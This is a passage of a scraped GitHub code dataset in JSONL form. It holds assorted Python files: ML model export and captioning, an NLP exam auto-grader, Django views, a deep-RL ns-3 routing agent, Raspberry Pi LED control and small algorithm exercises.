first_cell['source'][:-1] + 'a\"'\n if len(first_cell['source']) > 10:\n first_cell['source'] = '\"a\"'\n jupytext.write(notebook, path)\n\n\ndef modify_py_file(path):\n with open(path) as f:\n data = f.read()\n line_1 = '\"some_old_code\"'\n line_2 = '\"some_new_code\"'\n\n if line_1 in data:\n data = data.replace(line_1, line_2)\n elif line_2 in data:\n data = data.replace(line_2, line_1)\n else:\n data = data + \"\\n\" + line_1\n with open(path, \"w\") as f:\n print(data, file=f, flush=True, end='')\n\n\nif __name__ == '__main__':\n os.setpgrp()\n start_jupyter_server()\n sleep(1000)\n","repo_name":"festeh/jure","sub_path":"test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"7"} +{"seq_id":"13704196062","text":"from facemesh import FaceMesh\nimport torch\n\nnet = FaceMesh()\nnet.load_weights(\"facemesh.pth\")\ntorch.onnx.export(\n net,\n torch.randn(1, 3, 192, 192, device='cpu'),\n \"facemesh.onnx\",\n input_names=(\"image\", ),\n output_names=(\"preds\", \"confs\"),\n opset_version=9\n)","repo_name":"renyuehe/fork-ai-Facemesh","sub_path":"onnx_package.py","file_name":"onnx_package.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} 
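The record above exports the FaceMesh network to ONNX with a named input ("image") and named outputs ("preds", "confs"). A quick sanity check for such an export is to feed the same tensor through both backends and compare the results. The sketch below is a minimal example under two assumptions not present in the record: that the onnxruntime package is installed, and that FaceMesh.forward returns the two tensors named in output_names.

import numpy as np
import onnxruntime as ort  # assumption: onnxruntime is installed
import torch
from facemesh import FaceMesh  # same module the export script imports

# Rebuild the PyTorch reference model exactly as in the export script.
net = FaceMesh()
net.load_weights("facemesh.pth")
net.eval()

# One fixed random input, shaped like the dummy tensor used for the export.
dummy = torch.randn(1, 3, 192, 192)
with torch.no_grad():
    preds_t, confs_t = net(dummy)  # assumed to match output_names=("preds", "confs")

# Run the exported graph; the feed-dict key must match input_names.
sess = ort.InferenceSession("facemesh.onnx", providers=["CPUExecutionProvider"])
preds_o, confs_o = sess.run(None, {"image": dummy.numpy()})

# Both backends should agree to within floating-point tolerance.
np.testing.assert_allclose(preds_t.numpy(), preds_o, rtol=1e-3, atol=1e-5)
np.testing.assert_allclose(confs_t.numpy(), confs_o, rtol=1e-3, atol=1e-5)
print("ONNX export matches the PyTorch outputs")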
+{"seq_id":"7090164037","text":"import nltk\nfrom nltk import word_tokenize, pos_tag\nfrom nltk.corpus import wordnet as wn\nimport re\nimport string\nimport inflect\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nfrom string import punctuation\nfrom sklearn.feature_extraction.text import ENGLISH_STOP_WORDS as stop_words\n#import sklearn.feature_extraction.text.ENGLISH_STOP_WORDS as stop_words\nimport mysql.connector\nimport math as math\nfrom datetime import datetime\nfrom datetime import date\nfrom mysql.connector import Error\n# nltk.download()\n# connect database\nmydb=mysql.connector.connect(host='localhost',port=3308,user='root',passwd='',database='examinate')\n# extractive summarization:\n\ndef sent_tokenizer(s):\n sents = []\n for sent in s.split('.'):\n sents.append(sent.strip())\n return sents\n\n\ndef count_words(tokens):\n word_counts = {}\n for token in tokens:\n if token not in stop_words and token not in punctuation:\n if token not in word_counts.keys():\n word_counts[token] = 1\n else:\n word_counts[token] += 1\n return word_counts\n\n# word_counts\n\n\ndef word_freq_distribution(word_counts):\n freq_dist = {}\n max_freq = max(word_counts.values())\n for word in word_counts.keys():\n freq_dist[word] = (word_counts[word]/max_freq)\n return freq_dist\n\n\n# freq_dist\n\ndef score_sentences(sents, freq_dist, max_len=40):\n sent_scores = {}\n for sent in sents:\n words = sent.split(' ')\n for word in words:\n if word.lower() in freq_dist.keys():\n if len(words) < max_len:\n if sent not in sent_scores.keys():\n sent_scores[sent] = freq_dist[word.lower()]\n else:\n sent_scores[sent] += freq_dist[word.lower()]\n return sent_scores\n\n\n# sent_scores\n\ndef summarize(sent_scores, k):\n top_sents = Counter(sent_scores)\n summary = ''\n scores = []\n\n top = top_sents.most_common(k)\n for t in top:\n summary += t[0].strip() + '. 
'\n scores.append((t[1], t[0]))\n return summary[:-1], scores\n\n\np = inflect.engine()\ndef convert_number(text):\n # split string into list of words, initialise empty list\n temp_str = text.split()\n new_string = []\n for word in temp_str:\n # if word is a digit, convert the digit\n # to numbers and append into the new_string list\n if word.isdigit():\n temp = p.number_to_words(word)\n new_string.append(temp)\n # append the word as it is\n else:\n new_string.append(word)\n # join the words of new_string to form a string\n temp_str = ' '.join(new_string)\n return temp_str\ndef clean_text(essay):\n essay=str(essay)\n result = re.sub(r'http[^\\s]*', '',essay)\n result = re.sub('[0-9]+','', result).lower()\n result = re.sub('@[a-z0-9]+', '', result)\n return re.sub('[%s]*' % string.punctuation, '',result)\n\ndef deEmojify(essay):\n return essay.encode('ascii', 'ignore').decode('ascii')\n\ndef filtered_words(textToken):\n stop_words = stopwords.words('english')\n filteredwords = [word for word in textToken if word not in stop_words]\n return filteredwords\n\n\ndef penn_to_wn(tag):\n \"\"\" Convert between a Penn Treebank tag to a simplified Wordnet tag \"\"\"\n if tag.startswith('N'):\n return 'n'\n\n if tag.startswith('V'):\n return 'v'\n\n if tag.startswith('J'):\n return 'a'\n\n if tag.startswith('R'):\n return 'r'\n\n return None\n\ndef tagged_to_synset(word, tag):\n wn_tag = penn_to_wn(tag)\n if wn_tag is None:\n return None\n\n try:\n return wn.synsets(word, wn_tag)[0]\n except:\n return None\n\n\n# def sent_counter(sents):\n# sent_count=0\n# for sent in sents:\n# sent_count+=1\n# return sent_count\n\n\ndef sentence_summarization(texts) :\n sents = sent_tokenizer(texts)\n tokens = word_tokenize(texts)\n word_counts = count_words(tokens)\n freq_dist = word_freq_distribution(word_counts)\n sent_scores = score_sentences(sents, freq_dist)\n # sent_count=sent_counter(sents)\n # top_n=sent_count\n summary , summary_sent_scores = summarize(sent_scores,1)\n print(summary)\n return summary\n\ndef sim1(sentence1,sentence2):\n \"\"\" compute the sentence similarity using Wordnet \"\"\"\n # convert number,clean_text and\n sentence1 = deEmojify(clean_text(convert_number(sentence1)))\n sentence2 = deEmojify(clean_text(convert_number(sentence2)))\n # print(sentence1)\n # Tokenize and tag\n sentence1 = pos_tag(filtered_words(word_tokenize(sentence1)))\n sentence2 = pos_tag(filtered_words(word_tokenize(sentence2)))\n\n # Get the synsets for the tagged words\n synsets1 = [tagged_to_synset(*tagged_word) for tagged_word in sentence1]\n synsets2 = [tagged_to_synset(*tagged_word) for tagged_word in sentence2]\n # print(synsets1)\n # print(synsets2)\n # Filter out the Nones\n synsets1 = [ss for ss in synsets1 if ss]\n synsets2 = [ss for ss in synsets2 if ss]\n print(synsets1)\n print(synsets2)\n score, count = 0.0, 0\n\n # For each word in the first sentence\n for synset in synsets1:\n # Get the similarity value of the most similar word in the other sentence\n # Wu - Palmer Similarity: Return a score denoting how similar two word senses are, based on the depth\n # of the two senses in the taxonomy and that of their Least Common Subsumer(most specific ancestor node).Note that\n # at this time the scores given do _not_ always agree\n # with those given by Pedersen's Perl implementation of Wordnet Similarity.\n\n x1 = [synset.wup_similarity(ss) for ss in synsets2]\n print(x1)\n x2 = [0]\n for i in x1:\n if i is not None:\n x2.append(i)\n best_score = max(x2)\n # Check that the similarity could have been 
computed\n if best_score is not None:\n score += best_score\n count += 1\n # Average the values\n score /= count\n return score\n\ndef sim2(sentence1,sentence2):\n \"\"\" compute the sentence similarity using Wordnet \"\"\"\n # convert number,clean_text and\n sentence1 = deEmojify(clean_text(convert_number(sentence1)))\n sentence2 = deEmojify(clean_text(convert_number(sentence2)))\n # print(sentence1)\n # Tokenize and tag\n sentence1 = pos_tag(filtered_words(word_tokenize(sentence1)))\n sentence2 = pos_tag(filtered_words(word_tokenize(sentence2)))\n\n # Get the synsets for the tagged words\n synsets1 = [tagged_to_synset(*tagged_word) for tagged_word in sentence1]\n synsets2 = [tagged_to_synset(*tagged_word) for tagged_word in sentence2]\n # print(synsets1)\n # print(synsets2)\n # Filter out the Nones\n synsets1 = [ss for ss in synsets1 if ss]\n synsets2 = [ss for ss in synsets2 if ss]\n print(synsets1)\n print(synsets2)\n score, count = 0.0, 0\n\n # For each word in the first sentence\n for synset in synsets1:\n # Get the similarity value of the most similar word in the other sentence\n ''' Return a score denoting how similar two word senses are, based on the shortest path that connects \n the senses in the is-a (hypernym/hypnoym) taxonomy. The score is in the range 0 to 1. By default, there is now \n a fake root node added to verbs so for cases where previously a path could not be found---and None was returned---it should return \n a value. The old behavior can be achieved by setting simulate_root to be False.\n A score of 1 represents identity i.e. comparing a sense with itself will return 1.\n '''\n x1 = [synset.path_similarity(ss) for ss in synsets2]\n print(x1)\n x2 = [0]\n for i in x1:\n if i is not None:\n x2.append(i)\n best_score = max(x2)\n # Check that the similarity could have been computed\n if best_score is not None:\n score += best_score\n count += 1\n # Average the values\n score /= count\n return score\n\ndef sentence_similarity(sentence1, sentence2):\n score=max(sim1(sentence1,sentence2),sim2(sentence1,sentence2))\n return score\n\n# def find_top_n(text):\n# sents = sent_tokenizer(text)\n# sent_counter=0\n# for sent in sents:\n# sent_counter+=1\n# return sent_counter\n\n\n\n\nmycursor=mydb.cursor()\n\n\n# now = datetime.now()\n# current_time = now.strftime(\"%H:%M:%S\")\n# today = date.today()\n# current_day = today.strftime(\"%Y-%M-%D\")\nsl='select * from exam where flag =0'\nmycursor.execute(sl)\nexams=mycursor.fetchall()\n\nfor exam in exams:\n flag=int(exam[8])\n s='select * from question where eId='+int(exam[0]).__str__()\n mycursor.execute(s)\n questions = mycursor.fetchall()\n for i in questions:\n qid = int(i[0])\n text1 = i[2]\n s1=sentence_summarization(text1)\n mycursor.execute('select * from stuanswer where qId='+qid.__str__())\n stuanswers = mycursor.fetchall()\n for j in stuanswers:\n text2 = j[3]\n sid = int(j[0])\n eid = int(j[2])\n if (j[4] == None):\n if(j[3]==None):\n mark=0\n else:\n qmark = i[3]\n s2=sentence_summarization(text2)\n x=sentence_similarity(text1,text2)\n m=x*float(qmark)\n mark=round(m,1)\n print(mark)\n b=mark-int(mark)\n if b>0.5 and b<=0.9:\n mark=math.ceil(mark)\n elif b<0.5 and b>=0.1:\n mark=math.floor(mark)\n try:\n # Execute the SQL commands\n updatemarksql = 'update stuanswer set qMark=' + mark.__str__() + ' where stuId=' + sid.__str__() + ' and qId=' + qid.__str__() + ' and eId=' + eid.__str__()\n mycursor.execute(updatemarksql)\n\n # Commit your changes in the database\n mydb.commit()\n except:\n # Rollback in case there is 
any error\n mydb.rollback()\n\n mycursor.execute('select * from stuanswer')\n\n # Displaying the result\n print(mycursor.fetchall())\n\n stusql='select eId,stuId,sum(qMark) from(select * from stuanswer where eId= '+int(exam[0]).__str__()+' )as stu group by stuId '\n\n mycursor.execute(stusql)\n d=mycursor.fetchall()\n\n\n for t in d:\n if flag==0:\n insertmarksql='insert into mark values('+int(t[0]).__str__()+','+int(t[1]).__str__()+','+int(t[2]).__str__()+')'\n mycursor.execute(insertmarksql)\n mydb.commit()\n esql = 'update exam set flag=1 where eId=' +int(t[0]).__str__()\n mycursor.execute(esql)\n mydb.commit()\n\n\nmycursor.execute('select * from mark')\nprint(mycursor.fetchall())\nmydb.close()","repo_name":"Suha523/AGSOEQ-E-Exam","sub_path":"testCode2.py","file_name":"testCode2.py","file_ext":"py","file_size_in_byte":10975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21350061167","text":"from django.shortcuts import render\nfrom .models import Comment,Reply\n\n# Create your views here.\n#Comment submission by logged in user\n@login_required\ndef submit_comment(request):\n\n if request.method == 'POST' :\n\n comment_title = request.POST.get('comment_title')\n comment_content = request.POST.get('comment_content')\n post_id = request.POST.get('post_id')\n current_user = request.user\n profile = UserProfileInfo.objects.get(user=current_user)\n\n c = Comment()\n c.post = Post.objects.get(id=post_id)\n c.content = comment_content\n c.author = UserProfileInfo.objects.get(id=profile.id)\n c.published_date = datetime.now()\n c.save()\n\n return HttpResponseRedirect(reverse('blog:post_details', args=(post_id, )))\n\n#Reply submission by logged in user\n@login_required\ndef submit_reply(request):\n\n if request.method == 'POST' :\n post_id = request.POST.get('post_id')\n reply_title = request.POST.get('reply_title')\n reply_content = request.POST.get('reply_content')\n comment_id = request.POST.get('comment_id')\n current_user = request.user\n profile = UserProfileInfo.objects.get(user=current_user)\n\n r = Reply()\n r.comment = Comment.objects.get(id=comment_id)\n r.content = reply_content\n r.author = UserProfileInfo.objects.get(id=profile.id)\n r.published_date = datetime.now()\n r.save()\n\n return HttpResponseRedirect(reverse('blog:post_details', args=(post_id, ))) # have to work here\n","repo_name":"dimiksonkha/django-blog","sub_path":"comments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"24412973084","text":"from coco_utils import *\nfrom coco_train import data_transform\nfrom coco_vocab import load_vocabulary\nfrom coco_models import CNN, RNN\nimport json\n\n\ndef predict(args):\n # hyperparameters\n batch_size = args.batch_size\n\n vocab = load_vocabulary()\n\n test_path = 'data/test2014'\n test_file_name = 'captions_test2014_rnn152_results.json'\n\n val_path = 'data/val2014'\n val_file_name = 'captions_val2014_rnn152_results.json'\n\n test_loader = get_image_loader(dir_path=os.path.join(test_path),\n transform=data_transform,\n batch_size=batch_size,\n shuffle=True,\n num_workers=2)\n val_loader = get_image_loader(dir_path=os.path.join(val_path),\n transform=data_transform,\n batch_size=batch_size,\n shuffle=True,\n num_workers=2)\n\n embed_size = args.embed_size\n num_hidden = args.num_hidden\n\n encoder = CNN(embed_size)\n decoder = RNN(embed_size, num_hidden, len(vocab), 1)\n\n 
encoder_state_dict, decoder_state_dict, optimizer, *meta = load_model(args.checkpoint_file)\n encoder.load_state_dict(encoder_state_dict)\n decoder.load_state_dict(decoder_state_dict)\n\n if torch.cuda.is_available():\n encoder.cuda()\n decoder.cuda()\n\n try:\n test_results = []\n for step, (images, image_ids) in enumerate(test_loader):\n images = to_variable(images, volatile=True)\n features = encoder(images)\n captions = decoder.sample(features)\n captions = captions.cpu().data.numpy()\n captions = [translation(cap, vocab) for cap in captions]\n captions_formatted = [{'image_id': int(img_id), 'caption': cap} for img_id, cap in zip(image_ids, captions)]\n test_results.extend(captions_formatted)\n print('Sample:', captions_formatted)\n except KeyboardInterrupt:\n print('if you wish')\n finally:\n with open(test_file_name, 'w') as f:\n json.dump(test_results, f)\n\n try:\n val_results = []\n for step, (images, image_ids) in enumerate(val_loader):\n images = to_variable(images, volatile=True)\n features = encoder(images)\n captions = decoder.sample(features)\n captions = captions.cpu().data.numpy()\n captions = [translation(cap, vocab) for cap in captions]\n captions_formatted = [{'image_id': int(img_id), 'caption': cap} for img_id, cap in zip(image_ids, captions)]\n val_results.extend(captions_formatted)\n print('Sample:', captions_formatted)\n except KeyboardInterrupt:\n print('if you wish')\n finally:\n with open(val_file_name, 'w') as f:\n json.dump(val_results, f)\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--checkpoint_file', type=str,\n default=None, help='path to saved checkpoint')\n parser.add_argument('--batch_size', type=int,\n default=128, help='size of batches')\n parser.add_argument(\"--test\", type=int,\n default=1, help='if eval test data')\n parser.add_argument('--embed_size', type=int,\n default='512', help='number of embeddings')\n parser.add_argument('--num_hidden', type=int,\n default='512', help='number of embeddings')\n args = parser.parse_args()\n predict(args)","repo_name":"christophe001/MSCOCO","sub_path":"coco_prediction.py","file_name":"coco_prediction.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"32857803156","text":"#m1\nfrom asyncio import sleep\nimport time\nimport threading\nfrom pynput.mouse import Button, Controller\nfrom pynput.keyboard import Listener, KeyCode\n\n\n#m2\nimport pyautogui\n\n\n\n\n\n#Method 1\ndef method1():\n time.sleep(1)\n button = Button.right\n mouse = Controller()\n mouse.click(button=button)\n#Method 1\n\n\n\n#Method 2\n# pip install pyautogui\ndef method2():\n pyautogui.click(500,100)\n#Method 2\n\n\n\n\n#Keyboard Start\ndef keb():\n pyautogui.typewrite(\"Hello World\")\n#Keyboard End\n\n\n\n\n\n#Main Function Start\ndef main():\n method2()\n time.sleep(1)\n keb()\n\nif __name__==\"__main__\":\n main()\n#Main Function End\n","repo_name":"rezafarazi/auto_clicker_and_writer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30207348844","text":"#n-queen is a problem of placing n queens on a n*n chess board such that no queen can attack any other queens on the board. 
\n#The queen can attack horizontally, vertically and diagonally.\n#This is a recursive solution to the n-queen problem.\n#The solution is based on the backtracking algorithm.\n\n\nN = int(input(\"Enter the number of queens: \"))\n\nboard = [[0]*N for _ in range(N)] #create a 2d array of size N*N and initialize it with 0\n\ndef isAttack(i,j): #function to check if a queen can attack another queen\n for k in range(N): #for every row and column\n if (board[i][k] == 1 or board[k][j] == 1):\n return True\n \n for k in range(N): #for every diagonal\n for m in range(N):\n if ((k+m == i+j) or (k-m == i-j)):\n if board[k][m] == 1:\n return True\n return False\n\ndef NQueen(n): #function to place n queens on the board\n if n==0:\n return True\n \n for i in range(N): #for every row and column\n for j in range(N):\n if not(isAttack(i,j)) and (board[i][j]!=1):\n board[i][j] = 1\n \n if NQueen(n-1)==True: #recursive call\n return True\n \n board[i][j] = 0 #backtracking\n return False\n\n\n#Driver Code\nNQueen(N)\n\n#print the board\nfor i in board:\n print(i)","repo_name":"vinay-ghate/Algorithms-With-Py","sub_path":"nqueen.py","file_name":"nqueen.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14198343775","text":"import queue\nfrom typing import List, Any\n\n\nclass Solution:\n def duplicateZeros(self, arr: List[int]) -> None:\n \"\"\"\n Do not return anything, modify arr in-place instead.\n \"\"\"\n temp: Any = queue.Queue()\n for i in range(len(arr)):\n if arr[i] == 0:\n temp.put(0)\n if not temp.empty():\n temp.put(arr[i])\n arr[i] = temp.get()\n","repo_name":"FanchenBao/leetcode","sub_path":"Contest_141/1089.py","file_name":"1089.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"34381927476","text":"# coding : utf-8\n\n# GPIO\nimport RPi.GPIO as GPIO\n\nimport time\n\n# assign the GPIO pin-numbering scheme\n# careful: the method name has no capital letters!
\nGPIO.setmode(GPIO.BOARD)\n\n# pin number (CHANNEL)\nLED_R = 11 # red LED\n\n# duty cycle values (brightness list): 0.0~100.0 (ascending)\ndc = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 20, 30, 50, 70, 100]\n\n# configure the pin attributes\nGPIO.setup(LED_R, GPIO.OUT, initial=GPIO.LOW)\n\n# PWM (Pulse Width Modulation)\n# a signalling scheme that approximates intermediate values between the high and low levels\n# create a PWM object: pin 11, frequency 100 Hz\np = GPIO.PWM(LED_R, 100)\n\n# output the PWM signal \np.start(30) # duty cycle\n\ntime.sleep(5)\n\n# stop the PWM\np.stop()\n\n# release the GPIO pins\nGPIO.cleanup()","repo_name":"db3124/kitech_iot","sub_path":"Rasberry/200219/led_pwm_1_200219.py","file_name":"led_pwm_1_200219.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14667016953","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pfrl\nimport torch\nimport gym\nimport argparse\nfrom pfrl.q_function import StateQFunction\nimport torch.nn.functional as F\nfrom pfrl.initializers import init_chainer_default\nfrom pfrl.nn.mlp import MLP\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom ns3gym import ns3env\n\nparser = argparse.ArgumentParser(description=\"start simulation script on/off\")\nparser.add_argument('--start', type= int,default=1,help=\"start the ns-3 simulation script 0/1, default=1\")\nparser.add_argument('--total_episodes', type=int ,default=100, help=\"the total episodes number default= 100 episodes\")\nparser.add_argument('--total_steps', type=int, default=300, help=\"total steps number in each episode, default= 300 steps\")\nparser.add_argument('--agent_name',type=str,default=\"Dueling DDQN\"\n ,help=\"choose the DRL agent that will give decisions for the simulation, \"\n \"DRL agents: Dueling DDQN | Dueling DDQN-MLPS | DDQN, default= Dueling DDQN\")\n\nargs = parser.parse_args()\nstartSim = bool(args.start)\ntotal_episodes = args.total_episodes\ntotal_steps = args.total_steps\nagent_name= args.agent_name\n\nport = 5555\n\n# env = gym.make('ns3-v0',port=port)\nenv = ns3env.Ns3Env(port=port,startSim=startSim)\nenv.reset() \n\nob_space = env.observation_space\nac_space = env.action_space\nprint(\"Observation space: \", ob_space, ob_space.dtype)\nprint(\"Action space: \", ac_space, ac_space.n)\n\n# obs_size must be 4 since we inject the delay value in observation vector,\n# but we'll not use it for the observation\nobs_size = 4\nn_actions = env.action_space.n\n\n#Dueling DDQN QFunction\nclass DuelingDDQNQFunction(torch.nn.Module):\n def __init__(self, obs_size, n_actions):\n super().__init__()\n self.l1 = torch.nn.Linear(obs_size, 50)\n self.l2 = torch.nn.Linear(50, 50)\n self.l3_v = torch.nn.Linear(50, 1) # State value function stream\n self.l3_a = torch.nn.Linear(50, n_actions) # Advantage function stream\n\n def forward(self, x):\n h = x\n h = torch.nn.functional.relu(self.l1(h))\n h = torch.nn.functional.relu(self.l2(h))\n\n v = self.l3_v(h)\n a = self.l3_a(h)\n\n q = v + a - a.mean(dim=1, keepdim=True)\n return pfrl.action_value.DiscreteActionValue(q)\n\n# bias initializer for the FC layers\ndef constant_bias_initializer(bias=0.0):\n @torch.no_grad()\n def init_bias(m):\n if isinstance(m, torch.nn.Linear):\n m.bias.fill_(bias)\n\n return init_bias\n\n#Dueling DDQN with MLP\nclass DuelingDQNWithMLP(torch.nn.Module, StateQFunction):\n \"\"\"Dueling Q-Network\n\n See: http://arxiv.org/abs/1511.06581\n \"\"\"\n\n def __init__(self, n_actions, n_input_elements, activation=F.relu, bias=0.1):\n self.n_actions = n_actions\n self.n_input_elements = n_input_elements\n 
self.activation = activation\n self.bias = bias\n super().__init__()\n\n # Define the linear layers to replace the convolutional layers\n self.fc_layers = torch.nn.ModuleList(\n [\n torch.nn.Linear(n_input_elements, 50),\n torch.nn.Linear(50, 50),\n torch.nn.Linear(50, 50),\n ]\n )\n\n # MLPs for the advantage and value streams\n self.a_stream = MLP(50, n_actions, [25]) # Update the input size to 64\n self.v_stream = MLP(50, 1, [25])\n\n # Apply initialization and bias to the linear layers\n self.fc_layers.apply(init_chainer_default) # MLP already applies\n self.fc_layers.apply(constant_bias_initializer(bias=self.bias))\n\n def forward(self, x):\n h = x\n\n # Pass through the linear layers with activation\n for layer in self.fc_layers:\n h = self.activation(layer(h))\n\n # Advantage\n batch_size = x.shape[0]\n h = h.view(batch_size, -1) # Reshape instead of flatten\n ya = self.a_stream(h)\n mean = torch.reshape(torch.sum(ya, dim=1) / self.n_actions, (batch_size, 1))\n ya, mean = torch.broadcast_tensors(ya, mean)\n ya -= mean\n\n # State value\n ys = self.v_stream(h)\n\n ya, ys = torch.broadcast_tensors(ya, ys)\n q = ya + ys\n return pfrl.action_value.DiscreteActionValue(q)\n \n# DDQN QFunction\nclass DDQNQFunction(torch.nn.Module):\n\n def __init__(self, obs_size, n_actions):\n super().__init__()\n self.l1 = torch.nn.Linear(obs_size, 50)\n self.l2 = torch.nn.Linear(50, 50)\n self.l3 = torch.nn.Linear(50, n_actions)\n\n def forward(self, x):\n h = x\n h = torch.nn.functional.relu(self.l1(h))\n h = torch.nn.functional.relu(self.l2(h))\n h = self.l3(h)\n return pfrl.action_value.DiscreteActionValue(h)\n\nif agent_name == \"Dueling DDQN\":\n q_func = DuelingDDQNQFunction(obs_size, n_actions)\nelif agent_name == \"Dueling DDQN-MLPS\":\n q_func = DuelingDQNWithMLP(n_actions=n_actions,n_input_elements=obs_size,activation=torch.nn.functional.relu, bias=0.1)\nelse:\n q_func= DDQNQFunction(obs_size, n_actions)\n\n# Agent parameters and components setup\noptimizer = torch.optim.Adam(q_func.parameters(), eps=1e-2)\n# Set the discount factor that discounts future rewards.\ngamma = 0.9\n\n# Use epsilon-greedy for exploration\nexplorer = pfrl.explorers.LinearDecayEpsilonGreedy(\n start_epsilon=1.0, end_epsilon=0.0, decay_steps=2500, random_action_func=env.action_space.sample)\n# Specify a replay buffer and its capacity.\nreplay_buffer = pfrl.replay_buffers.ReplayBuffer(capacity=10 ** 6)\n\n# Since observations from ns3 simulation is numpy.float64 while\n# As PyTorch only accepts numpy.float32 by default, specify\n# a converter as a feature extractor function phi.\nphi = lambda x: x.astype(np.float32, copy=False)\n\n# Set the device id to use GPU. 
To use CPU only, set it to -1.\n# gpu = -1\n\n#Now create an agent that will interact with the environment \n#based on Double Learning and the selected QFunction.\nagent = pfrl.agents.DoubleDQN(\n q_func,\n optimizer,\n replay_buffer,\n gamma,\n explorer,\n replay_start_size=128,\n update_interval=1,\n target_update_interval=10,\n minibatch_size=128,\n phi=phi,\n # gpu=gpu,\n)\n\ndelay_history = []\nrew_history = []\n\nenv._max_episode_steps = total_steps\n\nfor i in range(1, total_episodes + 1):\n obs = env.reset()\n \n delaySum = 0 # return (sum of delaySum)\n obs = obs[:4]\n print(\"reset State:\",obs)\n rewardSum = 0 # return (sum of rewards)\n\n for step in range(1, total_steps + 1):\n \n action = agent.act(obs)\n obs, reward, done, _ = env.step(action)\n delaySum += obs[4]\n obs = obs[:4]\n rewardSum += reward\n reset = step == total_steps # testing if the steps reach the max value\n agent.observe(obs, reward, done, reset)\n\n if done:\n break\n\n avg_delay = delaySum / step \n delay_history.append(avg_delay/int(_)) \n rew_history.append(rewardSum) \n \n if i % 10 == 0:\n print('episode:', i, 'R:', rewardSum)\n print(\"episode: {}/{}, time: {}, rew: {}, eps: {}\"\n .format(i, total_episodes, step, rewardSum, agent.explorer.__dict__.values()))\n if i % 50 == 0:\n print('statistics:', agent.get_statistics())\n \nprint('Finished.')\n\nagent.save(\"/home/gadour/Blobs\")\n\nprint(\"Plot Learning Performance\")\nmpl.rcdefaults()\nmpl.rcParams.update({'font.size': 16})\n# Create a figure with two subplots\nfig, (ax1, ax2) = plt.subplots(2, 1, figsize=(10, 8), sharex=True)\n# Plot 1: Learning Performance (Reward)\nax1.plot(range(len(rew_history)), rew_history, label='Reward', marker=\"\", color='red')\nax1.set_ylabel('Reward Sum')\nax1.legend(prop={'size': 12})\n\n# Plot 2: ( delaySum)\nax2.plot(range(len(delay_history)), delay_history, label='delay', marker=\"\", color=\"blue\")\nax2.set_ylabel('Average Delay')\nax2.legend(prop={'size': 12})\n\n# Common X-axis label for both plots\nax2.set_xlabel('Episode')\n\n# Adjust layout and save the plot to file\nplt.tight_layout()\nplt.savefig(f'{agent_name}-results.pdf', bbox_inches='tight')\n\n# Show the plots\nplt.show()\n\n# ns3gym 0.1.0 requires protobuf==3.20.3, but you have protobuf 4.21.12 which is incompatible. 
pip\n","repo_name":"Abdelkader-gnichi/network-routing-optimization-based-on-DRL-Agents-decisions-in-remote-rural-areas","sub_path":"agent_1.py","file_name":"agent_1.py","file_ext":"py","file_size_in_byte":8224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71894572383","text":"from django.test import TestCase\nfrom ford3.models.field_of_study import FieldOfStudy\nfrom ford3.tests.models.model_factories import ModelFactories\n\n\nclass TestFieldOfStudy(TestCase):\n def setUp(self):\n self.field_of_study = ModelFactories.get_field_of_study_test_object()\n\n def test_field_of_study_description(self):\n self.assertEqual(\n self.field_of_study.__str__(),\n 'Object Test Name')\n\n def test_get_or_create(self):\n # it should get\n fos, created = FieldOfStudy.objects.get_or_create(\n name=self.field_of_study)\n self.assertEqual(fos.id, self.field_of_study.id)\n self.assertFalse(created)\n\n # it should create\n fos, created = FieldOfStudy.objects.get_or_create(\n name='Manufacturing, Engineering and Technology')\n self.assertNotEqual(fos.id, self.field_of_study.id)\n self.assertTrue(created)\n self.assertEqual(len(FieldOfStudy.objects.all()), 2)\n","repo_name":"kartoza/ford3","sub_path":"django_project/ford3/tests/models/test_field_of_study.py","file_name":"test_field_of_study.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18213784695","text":"from utils import split_dict\n\nimport os\nimport pandas as pd\nimport logging\n\nclass HyperparamKeeper:\n \n @property\n def df(self):\n self.__check_dirty()\n return self.__params\n \n @property\n def meta_cols(self): return self.__meta_cols\n @property\n def rec_cols(self): return self.__rec_cols\n @property\n def result_cols(self): return self.__result_cols\n\n #cols = ('data__label', 'data__size', 'vect__ngram_range', 'vect__max_df', 'clf__penalty', 'clf__C', 'cv__fold', 'cv__scoring', 'cv__score') \n\n def __init__(self, filename, cols, convs=None, score_idx=-1):\n\n self.__meta_cols = tuple(cols[0])\n self.__rec_cols = tuple(cols[1])\n self.__result_cols = tuple(cols[2])\n cols = [*self.__meta_cols, *self.__rec_cols, *self.__result_cols]\n\n self.__score_idx = score_idx\n self.__fname = filename\n self.__params = pd.read_csv(self.__fname, index_col=0, converters=convs) if os.path.exists(self.__fname) else\\\n pd.DataFrame([], columns=cols)\n self.__dirty = False\n \n def __str__(self):\n return str(self.__params)\n \n def __check_dirty(self):\n if self.__dirty:\n 